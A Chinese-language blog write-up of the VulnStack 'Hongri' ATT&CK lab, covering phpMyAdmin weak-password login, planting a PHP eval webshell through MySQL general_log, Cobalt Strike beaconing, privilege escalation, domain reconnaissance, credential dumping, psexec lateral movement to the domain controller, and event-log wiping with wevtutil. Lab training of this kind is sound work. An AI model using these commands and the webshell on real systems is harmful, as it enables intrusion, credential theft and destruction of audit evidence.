【渗透测试】ATT&CK靶场一,phpmyadmin,域渗透,内网横向移动攻略
|
1,285
|
0
|
未分类

1418 字
|
7 分钟

前言

VulnStack,作为红日安全团队匠心打造的知识平台,其独特优势在于全面模拟了国内企业的实际业务场景,涵盖了CMS、漏洞管理及域管理等核心要素。这一设计理念源于红日安全团队对ATT&CK红队评估设计模式的深刻理解和巧妙应用。靶场环境的构建与题目设计均围绕环境搭建、漏洞利用、内网信息搜集、横向移动、渗透通道构建、持久控制及痕迹清理等多维度展开,旨在为安全研究者打造一个真实且全面的内网渗透学习环境。如果哪里出错了,还请师傅们指出,内容仅供参考,不喜勿喷,感谢。

image-20240821152514635

环境准备

下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

红日一的靶机一共有三台机器

image-20240825180544741

网络拓扑结构

image-20240826203050580

首先修改虚拟网络编辑器为仅主机的网卡为52段

image-20240825181906416

win7外网主机添加一块网卡,用于模拟公网服务器

image-20240825180340463

启动后配置本地连接为自动获取ip,它默认设的静态不是我们的主机net模式,就无法上网,甚至访问不了主机

image-20240825190253174

win2008为域控主机,配置如下,将net模式修改为仅主机

image-20240825185419014

win2003为域成员

image-20240825185346961

启动环境

登录密码:hongrisec@2019,三台密码都是一样的,如果登录后要你重新修改密码,那么三台机器都是你修改之后的密码,账户名都为Administrator

win7启动web服务即可开始渗透了

image-20240825182955011

信息收集

发现主机129

image-20240825190730900

再对他进行nmap端口扫描,发现端口80和3306开放的mysql端口

image-20240825204056292

访问靶机地址,里面包含了系统的phpstudy网站的绝对路径和管理员邮箱,还有远程文件包含函数的打开

image-20240825205800234

下滑还发现一个mysql检测

image-20240825204600941

默认弱口令root/root,即可测试登录成功

image-20240825204507622

我们用kali自带的目录扫描器dirb,扫到如下内容

dirb http://192.168.209.129/

image-20240825205221559

一个一个访问寻找可用的信息,phpinfo.php,php版本5.4.45

image-20240825205250250

还有一个phpmyadmin,用刚刚的弱口令登陆即可

image-20240825205929192

web渗透

进入后台,发现mysql不允许向外部写文件,没有拿到系统权限之前我们也修改不了这个文件写入的路径

show variables like "secure%";

image-20240825210448226

那么就用第二种方式,日志写入

show variables like "%general%";

image-20240825210959778

我们用的是root账户属于DBA用户,这个时候我们就能直接修改日志路径为当前网站的根目录,并创建一个shell.php,写入一句话木马,注意,这里的写入实际上写的是日志文件,而不是向外部写文件,所以不需要secure_file_priv的参数为” ”

set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/shell.php";

image-20240825211343019

image-20240825211810962

向日志写入一句话木马,就可以上线成功

select "<?php @eval($_POST[10]); ?>";

image-20240825212007099

访问日志shell.php

image-20240825212029722
蚁剑连接

image-20240825212513078

cs生成木马

image-20240826095022977

上传木马

image-20240826095002637

执行木马即可上线

image-20240826095357984

关闭防火墙,在这里关不关都无所谓

shell netsh advfirewall set allprofiles state off

image-20240826102218271

权限提升

查看权限信息,是超级管理员

getuid

image-20240826102326253

权限提升

image-20240826175423707

选择监听模块为你kali服务器地址

image-20240826102730859

一个个尝试,选项xvc-exe提权

image-20240826102718739

提权到系统权限成功

image-20240826102807476

内网信息收集

查看ip地址

shell ipconfig

image-20240826101605862

显示所有系统用户

shell net user

image-20240826104041192

列举计算机名

shell net view

image-20240826104117216

判断是否存在域

shell net config Workstation

image-20240826104150641

查看有几个域,结果为GOD一个

shell net view  /domain

image-20240826104223609

利用跳板机进行端口扫描

image-20240826104343788

指定为该主机的另一个网卡,可以使用arp扫描也可以使用icmp扫描

image-20240826104404290

发现两台主机

image-20240826104735899

且都开放了445端口

image-20240826105845825

抓取明文密码

image-20240826104857388

内网横向

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道(Windows上的SMB(Server Message Block)协议是一种网络文件共享协议,它允许用户在网络上的计算机之间访问文件和打印机等资源。)

新建监听器

image-20240826110021520

image-20240826110218245

以列表形式展示目标

image-20240826110735862

找到刚刚扫描出来的域控主机,进行横向移动,选择psexec选项

image-20240826110820766

配置如下

image-20240826110922975

这时候就可以拿到域控服务器

image-20240826111327199

另外一台内网主机也是这样,因为他们都处于同域下

image-20240826140657871

清除日志,注意,多执行几次,有些时候可能清理不干净

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

image-20240826173556830

或者直接使用插件

image-20240826173733111

image-20240826173747058

网络拓扑图已全部是上线

image-20240826183227480

总结

我成功上线了3台靶机,hhhhhhh,师傅们点点赞,蟹蟹

202408262019441 (1)

感今怀昔

最新可用,bp+charles小程序抓包教程

【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

内网渗透利器,Cobal_Strike汉化使用指南

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结—-实战解析

							
							

							
对某CMS漏洞练习平台的一次xss、sql注入、越权黑盒思路分析(整改)

							
							

							
DNSlog注入全解析:实战步骤、原理揭秘与局限性探讨

							
							

							
安全狗WAF绕过系列

							
							

							
sql注入某狗WAF绕过(补充)

							
							

							
Kali下安装与使用BeEF:反射型与存储型XSS攻击、Cookie会话劫持、键盘监听及浏览器操控技巧

							
							

							
PwnLab: init-文件包含、反弹shell、提权–靶机渗透思路讲解

							
							

							
CTF实战:Jordaninfosec-CTF01靶场全攻略,手把手教你拿Flag!

							
							

							
Java框架Shiro流量分析

							
							

							
Cobal_Strike使用